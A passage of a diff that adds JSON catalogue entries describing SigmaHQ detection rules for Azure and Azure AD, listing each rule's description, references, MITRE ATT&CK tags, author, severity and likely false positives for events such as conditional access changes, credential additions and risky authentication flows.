servers added to an AAD Health AD FS service instance" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.\nA threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\nThe health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.\n", + "uuid": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", + "value": "Azure Active Directory Hybrid Health AD FS Service Delete", + "meta": { + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1578.003" + ], + "creation_date": "2021/08/26", + "filename": "azure_aadhybridhealth_adfs_service_delete.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "medium", + "falsepositive": [ + "Legitimate AAD Health AD FS service instances being deleted in a tenant" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert on conditional access changes where non approved actor removed CA Policy.", + "uuid": "26e7c5e2-6545-481e-b7e6-050143459635", + "value": "CA Policy Removed by Non Approved Actor", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ], + "creation_date": "2022/07/19", + "filename": "azure_aad_secops_ca_policy_removedby_bad_actor.yml", + "author": "Corissa Koopmans, '@corissalea'", + "level": "medium", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare \"old\" vs \"new\" value.", + "uuid": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", + "value": "CA Policy Updated by Non Approved Actor", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ], + "creation_date": "2022/07/19", + "filename": "azure_aad_secops_ca_policy_updatedby_bad_actor.yml", + "author": "Corissa Koopmans, '@corissalea'", + "level": "medium", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert on conditional access changes.", + "uuid": "0922467f-db53-4348-b7bf-dee8d0d348c6", + "value": "New CA Policy by Non-approved Actor", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ], + "creation_date": "2022/07/18", + "filename": "azure_aad_secops_new_ca_policy_addedby_bad_actor.yml", + "author": "Corissa Koopmans, '@corissalea'", + "level": "medium", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.", + "uuid": "dff74231-dbed-42ab-ba49-83289be2ac3a", + "value": "Sign-in Failure Bad Password Threshold", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2022/04/21", + "filename": "azure_aad_secops_signin_failure_bad_password_threshold.yml", + "author": "Corissa Koopmans, '@corissalea'", + "level": "high", + "falsepositive": [ + "Failed Azure AD Connect Synchronization", + "Service account use with an incorrect password specified", + "Misconfigured systems", + "Vulnerability scanners" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.", + "uuid": "2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", + "value": "Account Lockout", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_account_lockout.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2021/10/10", + "filename": "azure_account_lockout.yml", + "author": "AlertIQ", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when an account was created and deleted in a short period of time.", + "uuid": "6f583da0-3a90-4566-a4ed-83c09fe18bbf", + "value": "Account Created And Deleted Within A Close Time Frame", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_account_created_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/08/11", + "filename": "azure_ad_account_created_deleted.yml", + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", + "level": "high", + "falsepositive": [ + "Legit administrative action" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect successful authentications from countries you do not operate out of.", + "uuid": "8c944ecb-6970-4541-8496-be554b8e2846", + "value": "Successful Authentications From Countries You Do Not Operate Out Of", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml" + ], + "tags": [ + "attack.t1078" + ], + "creation_date": "2022/07/28", + "filename": "azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml", + "author": "MikeDuddington, '@dudders1'", + "level": "medium", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when sign-ins increased by 10% or greater.", + "uuid": "e1d02b53-c03c-4948-b11d-4d00cca49d03", + "value": "Increased Failed Authentications Of Any Type", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_failure_increase.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/08/11", + "filename": "azure_ad_auth_failure_increase.yml", + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when successful sign-ins increased by 10% or greater.", + "uuid": "67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", + "value": "Measurable Increase Of Successful Authentications", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_sucess_increase.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/08/11", + "filename": "azure_ad_auth_sucess_increase.yml", + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", + "level": "low", + "falsepositive": [ + "Increase of users in the environment" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect when authentications to important application(s) only required single-factor authentication", + "uuid": "f272fb46-25f2-422c-b667-45837994980f", + "value": "Authentications To Important Apps Using Single Factor Authentication", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml" + ], + "tags": [ + "attack.t1078" + ], + "creation_date": "2022/07/28", + "filename": "azure_ad_auth_to_important_apps_using_single_factor_auth.yml", + "author": "MikeDuddington, '@dudders1'", + "level": "medium", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert for Bitlocker key retrieval.", + "uuid": "a0413867-daf3-43dd-9245-734b3a787942", + "value": "Bitlocker Key Retrieval", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_bitlocker_key_retrieval.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/06/28", + "filename": "azure_ad_bitlocker_key_retrieval.yml", + "author": "Michael Epping, '@mepples21'", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert for device registration or join events where MFA was not performed.", + "uuid": "5afa454e-030c-4ab4-9253-a90aa7fcc581", + "value": "Device Registration or Join Without MFA", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/06/28", + "filename": "azure_ad_device_registration_or_join_without_mfa.yml", + "author": "Michael Epping, '@mepples21'", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert for changes to the device registration policy.", + "uuid": "9494bff8-959f-4440-bbce-fb87a208d517", + "value": "Changes to Device Registration Policy", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_policy_changes.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484" + ], + "creation_date": "2022/06/28", + "filename": "azure_ad_device_registration_policy_changes.yml", + "author": "Michael Epping, '@mepples21'", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect failed authentications from countries you do not operate out of.", + "uuid": "28870ae4-6a13-4616-bd1a-235a7fad7458", + "value": "Failed Authentications From Countries You Do Not Operate Out Of", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml" + ], + "tags": [ + "attack.t1078" + ], + "creation_date": "2022/07/28", + "filename": "azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml", + "author": "MikeDuddington, '@dudders1'", + "level": "low", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects guest users being invited to tenant by non-approved inviters", + "uuid": "4ad97bf5-a514-41a4-abd3-4f3455ad4865", + "value": "Guest Users Invited To Tenant By Non Approved Inviters", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml" + ], + "tags": [ + "attack.t1078" + ], + "creation_date": "2022/07/28", + "filename": "azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml", + "author": "MikeDuddington, '@dudders1'", + "level": "medium", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect when users are authenticating without MFA being required.", + "uuid": "28eea407-28d7-4e42-b0be-575d5ba60b2c", + "value": "Azure AD Only Single Factor Authentication Required", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_only_single_factor_auth_required.yml" + ], + "tags": [ + "attack.t1078" + ], + "creation_date": "2022/07/27", + "filename": "azure_ad_only_single_factor_auth_required.yml", + "author": "MikeDuddington, '@dudders1'", + "level": "low", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert for sign-ins where the device was non-compliant.", + "uuid": "4f77e1d7-3982-4ee0-8489-abf2d6b75284", + "value": "Sign-ins from Non-Compliant Devices", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/06/28", + "filename": "azure_ad_sign_ins_from_noncompliant_devices.yml", + "author": "Michael Epping, '@mepples21'", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.", + "uuid": "4d136857-6a1a-432a-82fc-5dd497ee5e7c", + "value": "Sign-ins by Unknown Devices", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_unknown_devices.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/06/28", + "filename": "azure_ad_sign_ins_from_unknown_devices.yml", + "author": "Michael Epping, '@mepples21'", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert for users added to device admin roles.", + "uuid": "11c767ae-500b-423b-bae3-b234450736ed", + "value": "Users Added to Global or Device Admin Roles", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_users_added_to_device_admin_roles.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/06/28", + "filename": "azure_ad_users_added_to_device_admin_roles.yml", + "author": "Michael Epping, '@mepples21'", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "User Added to an Administrator's Azure AD Role", + "uuid": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", + "value": "User Added to an Administrator's Azure AD Role", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1098/003/", + "https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098.003" + ], + "creation_date": "2021/10/04", + "filename": "azure_ad_user_added_to_admin_role.yml", + "author": "Rapha\u00ebl CALVET, @MetallicHack", + "level": "medium", + "falsepositive": [ + "PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a application is deleted in Azure.", + "uuid": "410d2a41-1e6d-452f-85e5-abdd8257a823", + "value": "Azure Application Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_deleted.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2021/09/03", + "filename": "azure_application_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Application being deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a application gateway is modified or deleted.", + "uuid": "ad87d14e-7599-4633-ba81-aeb60cfe8cd6", + "value": "Azure Application Gateway Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/16", + "filename": "azure_application_gateway_modified_or_deleted.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Application gateway being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a application security group is modified or deleted.", + "uuid": "835747f1-9329-40b5-9cc3-97d465754ce6", + "value": "Azure Application Security Group Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/16", + "filename": "azure_application_security_group_modified_or_deleted.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Application security group being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a configuration change is made to an applications AppID URI.", + "uuid": "1b45b0d1-773f-4f23-aedc-814b759563b1", + "value": "Application AppID Uri Configuration Changes", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_appid_uri_changes.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access" + ], + "creation_date": "2022/06/02", + "filename": "azure_app_appid_uri_changes.yml", + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "level": "high", + "falsepositive": [ + "When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.", + "uuid": "cbb67ecc-fb70-4467-9350-c910bdf7c628", + "value": "Added Credentials to Existing Application", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_added.yml" + ], + "tags": [ + "attack.t1098", + "attack.persistence" + ], + "creation_date": "2022/05/26", + "filename": "azure_app_credential_added.yml", + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "level": "high", + "falsepositive": [ + "When credentials are added/removed as part of the normal working hours/workflows" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a application credential is modified.", + "uuid": "cdeef967-f9a1-4375-90ee-6978c5f23974", + "value": "Azure Application Credential Modified", + "meta": { + "refs": [ + "https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_modification.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/02", + "filename": "azure_app_credential_modification.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Application credential added may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when highly privileged delegated permissions are granted on behalf of all users", + "uuid": "a6355fbe-f36f-45d8-8efc-ab42465cbc52", + "value": "Delegated Permissions Granted For All Users", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_delegated_permissions_all_users.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/07/28", + "filename": "azure_app_delegated_permissions_all_users.yml", + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "level": "high", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\nIf this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.\nThis can be a misconfigured application or potentially something malicious.\n", + "uuid": "248649b7-d64f-46f0-9fb2-a52774166fb5", + "value": "Application Using Device Code Authentication Flow", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_device_code_authentication.yml" + ], + "tags": [ + "attack.t1078", + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.initial_access" + ], + "creation_date": "2022/06/01", + "filename": "azure_app_device_code_authentication.yml", + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "level": "medium", + "falsepositive": [ + "Applications that are input constrained will need to use device code flow and are valid authentications." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when an end user consents to an application", + "uuid": "9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", + "value": "End User Consent", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/07/28", + "filename": "azure_app_end_user_consent.yml", + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when end user consent is blocked due to risk-based consent.", + "uuid": "7091372f-623c-4293-bc37-20c32b3492be", + "value": "End User Consent Blocked", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-stopped-due-to-risk-based-consent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent_blocked.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/07/10", + "filename": "azure_app_end_user_consent_blocked.yml", + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.", + "uuid": "74298991-9fc4-460e-a92e-511aa60baec1", + "value": "Added Owner To Application", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_owner_added.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access", + "attack.defense_evasion" + ], + "creation_date": "2022/06/02", + "filename": "azure_app_owner_added.yml", + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "level": "medium", + "falsepositive": [ + "When a new application owner is added by an administrator" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when app permissions (app roles) for other APIs are granted", + "uuid": "ba2a7c80-027b-460f-92e2-57d113897dbc", + "value": "App Permissions Granted For Other APIs", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_for_api.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/07/28", + "filename": "azure_app_permissions_for_api.yml", + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "level": "medium", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD", + "uuid": "c1d147ae-a951-48e5-8b41-dcd0170c7213", + "value": "App Granted Microsoft Permissions", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_msft.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/07/10", + "filename": "azure_app_permissions_msft.yml", + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "level": "high", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions", + "uuid": "5aecf3d5-f8a0-48e7-99be-3a759df7358f", + "value": "App Granted Privileged Delegated Or App Permissions", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_privileged_permissions.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/07/28", + "filename": "azure_app_privileged_permissions.yml", + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "level": "high", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "logsource.category": "No established category", + "logsource.product": "microsoft365portal" + } + }, + { + "description": "Detects when an app is assigned Azure AD roles, such as global adminsitrator, or Azure RBAC roles, such as subscription owner.", + "uuid": "b04934b2-0a68-4845-8a19-bdfed3a68a7a", + "value": "App Role Added", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_role_added.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/19", + "filename": "azure_app_role_added.yml", + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "level": "medium", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\nThe application then uses those credentials to authenticate the user against the identity provider.\n", + "uuid": "55695bc0-c8cf-461f-a379-2535f563c854", + "value": "Applications That Are Using ROPC Authentication Flow", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_ropc_authentication.yml" + ], + "tags": [ + "attack.t1078", + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.initial_access" + ], + "creation_date": "2022/06/01", + "filename": "azure_app_ropc_authentication.yml", + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "level": "medium", + "falsepositive": [ + "Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a configuration change is made to an applications URI.\nURIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.\n", + "uuid": "0055ad1f-be85-4798-83cf-a6da17c993b3", + "value": "Application URI Configuration Changes", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_uri_modifications.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access" + ], + "creation_date": "2022/06/02", + "filename": "azure_app_uri_modifications.yml", + "author": "Mark 